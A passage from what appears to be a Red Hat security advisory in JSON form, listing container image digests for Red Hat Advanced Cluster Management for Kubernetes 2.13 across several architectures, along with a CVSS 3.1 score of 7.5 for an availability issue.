"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:ac486bf6a84c573a9774aadd4ea995a551c0abcbfb42dbbb71dc03e6c900a211_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:61b112b8ebb2ca4e41f5ee4b0c09ad0b53c3a6b60297fb8c1f158c28a8f10b3d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:6bd79f2c4c516adc626c73dec28892cbeab65e349dff8f1fcb11d7242b614805_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:c920a77dcf02347d116035d5cfef1a365e02022713788a14045a9be2a1bd1c5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:eb7788d29142ad36cba099b1dcebe3eb1c28366f87f611ca4d0b375bc7f4b19d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5b7668d6f3b7fb994c4bbbb86bdb92d4258b88ab92337394b66058255c048ad8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:64930ec82f003294eaf26f6ac59c493e1bfc8c3d7addeb4c5b8f0cfcf458c406_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:753415fcdcc9f6b8685a54d83f4d35d1104d690215125a36d6df2b9873ac6cd3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:c58049e17034c0df635df55fce49cab392af3194f57c03bbb842d7c2acb247e5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0907a51a72f39393da4bdee241333b08b5b5591f1e9a5de7d67ad586d11da59b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:498cdf1888c2ef9f031baafc288323ebd0fe5d9b009cedb1443605cf4153c0c0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5ac47e52a78f31b8982de5b9144ec96baab80c78ba8d06d3efabda329e017d36_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:9819517abcb75b516ea0e158ad9cbb0a4ef847f7858531b751c04de5a53527be_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:2ae0730de393d5aeff08a9317fc70459421dd8d6fc7a65f2a9e4a28ae5b64d9d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:62c7b78b2726fd940db4bd435b13f6d07097395b069130b32ea0912c95333555_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8c986374ff8afd980f450877facc2927fdd6f655f3d6b7def6771485d00afeb1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8eeb6a344b773bdc4f50da36c956dbaa50d6474f5c045e92250274d0ed723b39_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:1d7f37fa0146f48291fd1dd12752d0a19c8e87c30e1698492b36274c79051a9e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:5c3cc196a8638f6fae7c246ff6746f2f453bbfab8e018683ee297609713664ac_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:e539ec4ab10e81c08d68991e3c77efd43497f4a5561ee1315ff8d467736d245a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:fbc20e8545d4562d05df98d5cfbc91a7a2d802a9d4ff8c0ea733126687c42c26_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:111bbc8fda153d16c384a622dd659c53b8cdc47e495a9fada411a5042954ab6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:433f0b3d09889613d5214ba1c084bdc99bdcbce227fefd10b0d8491442698ea9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:51096baed7d6ed403d88ac2dd935a30313f618b7552fee2b07367db5069601d1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:b3eefeffd90660b8e463f2b06dc5ee2b46e235efae7c13ed893828a6c9598459_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:58a8acff99aaaacdb7c292b615c2ed9a0418d82f75273c1809a6db05811713fa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:661a4a1fb71f36ac1663232ca6e098d1c101dc16168eec7eee471ae11f98f66c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bc06192ce81eac533cb7c080e8aef6587991534cb9b1787537c49753c0985e3d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:e8207895ec9e7006746043cf04fbf1e2897aa30e74b9184665be2ac50f9fe650_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:3074a430dd8bbb0399ce649186cb6140d8525e5b7c1e05b79a4ab74a32d989b8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:34de933b36ee01444cdf4d4a45e47466ef8dad6ab6345134524595c191928ffe_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:8a65d646180c7889d0ba1e3a11fd6796d0020301e4e721575f87585afd8f9dfe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:cf1b6cae5a10aec88554e71be094737b0a17efb07cd1175ca55f1799626f58f2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:036ee3882d4d6536c309d9aacea3dc611785deba3bd998092adcb1ba21664897_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:82914e82513e2f8522589886a5df6681d12c6442ff1b8ef05a21d31c09fa0f0d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:893831b7270214137b2fdf1e55f0175b4ef6de9b8763eaaf0e0a935c8ab1744d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d6e329af2d9c1648006e3fa0b0232562a2bed6e7a33c56e025517f7d9068b5cc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:131918c9878d040c3ec190a9c724a65dbf3bb27f55a0fcac250d92067dc69288_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:327af8db145b9bd6ada1c9f27faa493ce090af412c51dedd7b247e65dcad51fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:721ebc57b91b4f9bcfb25d7b29ee8a2ca60fcb231096af2812f9201778e3ca51_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:ebff3dd368f33d1aec215b947b88f4aa7e821db1577d448b8c6eb4e6ead7fe07_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:6a88ce891e0fc9619e983a5b63fef86f735b8df5eb56909075bd3bbb098dddf8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:7485348cced991c7a4399e21e077ed62b3a118b7093bd4f42f9863d9e0da5c26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:b8d70910405eec4d886b27fc348a982c0b6f906f7f0e65aceecffd9f09fd6602_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:e63891386bfb191cd0e74884cad1f86c462d57e51b9aeec7d9c5073ba4d723f9_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:01382838a23f75a6c03b30c68e9e42d72c22d773a4891260c639f7c8b60ffd87_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:1c74aaa66b6be9f5eb1f55851f1cc3f2a3878882c3fc972cd24232e9022f74e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:696d1f7c4b5415e49760f7a66368aa0260284b12b108d5feb560838a9bce8a6f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7328602aa637f1b555ecd56c05d6ade8dbee48fae78a0118b1e39774b8383704_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:3ae25beb920ec77de14769895f60da6a3d83fc41192ca5da5f976076853e5a50_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:c9bf774dfa3f5a66339a86f22961c54b2b41199efd173b016a2c7c57407dae40_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:d1cac9d50ec20e770ae41aa8f90474c269d80e84a9990e2c3e613a892b0c044c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:ddb5d8c476bcc9b6d4a7c0d116a2f5150acbfa80cc890d77d5d90bd496a7860e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:0ffd5a902860aad15377e20b1e6481e6cf746fa3e33509df0f88f93f9a9f8034_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:abcf4d6f42dec254d8b4197282fb449daf13d4724ed23ddc2aafde0328338f74_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b6ea1f6389ad207c45321ab5a36c03949986e74ef9dbf5e3d2fdb2ceb5c4a602_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:e126327d69e48f2844f5beafc34514d31e9f3eed0ac393399edf80cf31a2eabe_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:0f7b1ee143f154e6e33c452f95fd0a0afb7fd020e758a991d18abde990e49e0c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6363dfb96f394aef2b07b3a36c85d3af60dc3594ab615327176ba520704a4356_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:849cf23afa514a1d86073fed2424e487893655510721a0b9c0d4be4cf59bf60b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:a8843c7b628767803f2aa4b2658dc0a932157b20f98507004929036108c7dfb2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:428a52072881ee7714539f7721313ca78e06fd0e39ceb8de12f8a0d33fb4cd55_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:5145c15e9fa57bdd1d072e7c88f27d5f8f51caf395e542ad8fb54a098f8c24fb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:cb76c81b895dfb5bc384407baf76c5c74d9b509342e665f3d5ff234a40f16236_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:d7dae765d402cd9522c23689fc0e72f47659fc2f1184b8b16c51b6c5c6a2b890_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5af546f1d36b01b320fd950d227cdd8f62a765facc8614ba277fe218c5649e61_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:921a7995304e4648ac2fd0c08bec7d95adc09caca4d6d124cbba4ff8043edf19_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:a0928fa238b82f2c00778064d0f1e52ff507ffef7a0a3756b1f2f2022d375e4b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:fdc436ea03cb2d06976da109061aa0793672c306deef23708ee9e0b39395b6f7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:2adb87f4433d9516e2111150bccafbbb8dec179bdf3fe3acd38d7b27411cb666_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:4afad9568dc7dd2d90c396d08d596258e813bb67e2901135b539f279af382e09_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:508d4d8ee312e8d720eeca38f3823438548c5ab1260d8fa822ca49765f7aeef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:a31ab1ae8b4c3ead24f9ce3c913a4754972bd548d6e5b10ca22e61a6d9d3539a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:35ba01a14b8f7a0ed0e79fd9efe48280d26afa10a316daaec512f39cc6839adb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:384d23bb3f4e6fd2425e1b60ded99f027dcbaad14e631ffbe84845821a1c3215_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:a8ca367caa43ec006811fe370fdf440328dd22fc39be11e48f36396b781f36bb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:db8b5776a9dcb4b87a4de948c4c11d0164e66df188f97be6a6fd7e9953f5501e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:1e0a1eadbb77f4f14d48357af6a5b12406ae912210b53c14018b642e4f62d1fe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:4816e73043b8f73143cff29cff41292e62bb36467ba28a260ee46fd43ece915c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71d6b8f5471d7a23918763eeea53d991d98adf170e228348b77d2412ce752751_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:87f2e1ee942b226835c97b7abe43a62802146755141a850137b9ab03dd6fccf6_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:2b6a43ae23126321b9c94b37da646db4943331200434edc6a54be156150065f2_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:d24283b13f739561fae6bdfb730922a1d3804422dc41249e33e6084158afcec4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:e9df0b0323447cacad8942ecce2e690a9f498d5cb41b54e3bb55be6614ddaece_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:ed46808dba295cf093aa5caabc9782ee9f044c7e770adaf3657f57f0f6e1aaf9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:5a98450b5f85a75172ca51e2dcf096465635dc2e4c5fedfd74e1fdd665f3fa65_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:7388c812f31ff8f2b1c2653adf07906e2f50c356a1ad9130d3923d835e79e0e7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:bd521270153c8b5b8193e08fe4a7c959e5b9d22ed7e74a87827580974b3836f1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fc3b40899a332c041667de0965d58f50325eaddc8547145a2dff9aede38d69bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0668bbb16723e23ae64e4337a1347a6e0d2854d1c173cbc59c17a829e430bc00_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:177c2cb59b6b43f4ea650bbb603b144ca37aece398635a458d518dd55cae7fb6_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:78b0d35ce4fce4d279ad089ccf284f5e1425f947d95c3c72c5755bb00464305c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:f3b200f2a00217299f66cab9f89de8673003d194292b41157f663799b5c61c3e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:02486920d371f14bcbafc720545c4a6f24523a46483e60c00c7f25f52b3ea476_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1cb3639dfe65b6568b53de130e7b36b8f5ebceedd76c110ddb64fbe860bfde14_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:4124ae57ffa1b26bfc0e68b62c8325c5e17d332dca85b618a4ccba60cf52d1b5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:8243cc9646e4ae89aabf299e476a94124c8244dd54e0fb1c848a6bbbd0c94f62_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:2a64ce4183df6c5743ffa7df7b4192fce192e08eea5e03b76c9b621e5d351d2a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:4e6dd9d24ab247b2a7b84f7842b2a710eee3aa2fce58fc1516ef5bb55e0693f0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:d814b3c076f9ef671d74e156dce5d3f634130904f166a6a04a59df41e8ec07ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:faeaa0d157334dcf9a808ea8916272c9912726580dc0ca06b6e3bb85860772ab_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:2bc6310bd61774d74b1dd0245139b3bfc4940efb1bf424ad0e7a4d822f2271b8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:95baf4ac24b7c9d2fb2883cdf81c7d75f76c8c53aef6745eb732918718877cd4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c17ac85849d3cdf437d09d8ce9581b48a73304498a315db470ec655fdb88f529_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f6dcad139d0a85137a293dd7cf8c68819658d71a1a45914030cfb7d58dac146d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:1ef6867542269af4ce8cee7225dfb4e64680715a1bb34ed510b9fbf84d88fb2d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:58a418395bf71e339145d259b6906172fbc066e17e05071ce983c5615e703075_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:81f72d7522fcc4a0e948e52987671328dcbfd726b54125a23d893cd45e6cbdd5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:f4ad6f2ed37be694b95b1c00b32f797cc29a0dab790207a254b4d4f4f2aa7158_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:723dd5b7b166ed9fcedd2f6b2b2567e943ffcfa78bfe7974ac410d629495bc27_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:7f20f9bb4a9b57b618fd864fd49ef0b1a1cb81d20668ba9f1bb2392086d7a144_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b3b5013c3333ed731561416060e14930f276336fb23037c6a7109496faee095e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ccc5e9181f23112628ee91c9acc577627a501af9bb170b2bf0eb0837811e7328_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:0bd1b50f01e6228c56cf07c005ac8ead15d814b09813157b79fcea9292e42551_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:82107bc3ac83308ba96111cc5690a23d116bcd71c7a65face89e4d530b2e8382_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a673e83cb652160fc3db1b69505d21a634a15fcc68f3940bda25f64dc0ae7bb6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a765f440d03be4c90a764f6ec1a2bf2d4c4acb0f8af630aff9811aaa631327ca_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:e8b775e29dbba36821b79231e35017cefd5bb6d245dd1c2d8004150c4998a89c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eaa602fc272af9fce6ea4b2b2e700e24fc29b7fcaad3437abc73f247a5f994aa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:ef6cd34e8f03c566dea492474495c0142a506b973b1a1ae00667de2993c88209_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:fbf35da688ccf2c7049320cee23dcbc518d2787d52c78574ff44e481a38ec20f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:38a4caea83181ce3f04956654ed3e2241a4563718a66ddf09eb0997afe47e0ce_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:54d57a40c0ebc2b7922552aff95b6219c10c4f1b27627d36bc800c1db33a4651_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:8fb71c30e1217f0697c872db2bafbb5e06a7f727c6b508f269512447d6b5118d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:e58abdba80628700eaf2736cb65e6746d2b2126cc7b19ba403c19be5e8a22509_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:83bc597e83bd0756afa67adcbd50858b0d1c23f87b572706e9059dd26055b4a0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:a5ccbff1ad0a3001902044e52590ee18508632bce7822ebf54ba521eaae180eb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:db8ed91f54d683d9d3be3b0747f7429eb95accc8802593dd61d8c24e8a1facfb_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:f3d2daf907e6fd32654d1458c60b134f4d938a933e53161e588bcd94ff6b01df_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:0aa9df5f5bf523f7d6d4a9e931a1932e62056d942bf86396d33874adc85a91e8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:4d0252b36a0ca8f522e60e400463b22de506766bdf0c1f65e3e289a3c93002d1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:701bc2dd0a441216ea138b677dbf71d497d9b7acaad5f48661117008a8e5defe_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:b30887b0c8fb4292b6c87ef681761c18a112e0113647e2bde86c04c13f59b7a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6b65f79a765b69a84ac5924280e9f6d55875b8aceb6ae97f9a75cb6076bd074a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6d410e7e4de91970f44368e5cc1ce1ac83908550785263342f6038a988be30e4_ppc64le",
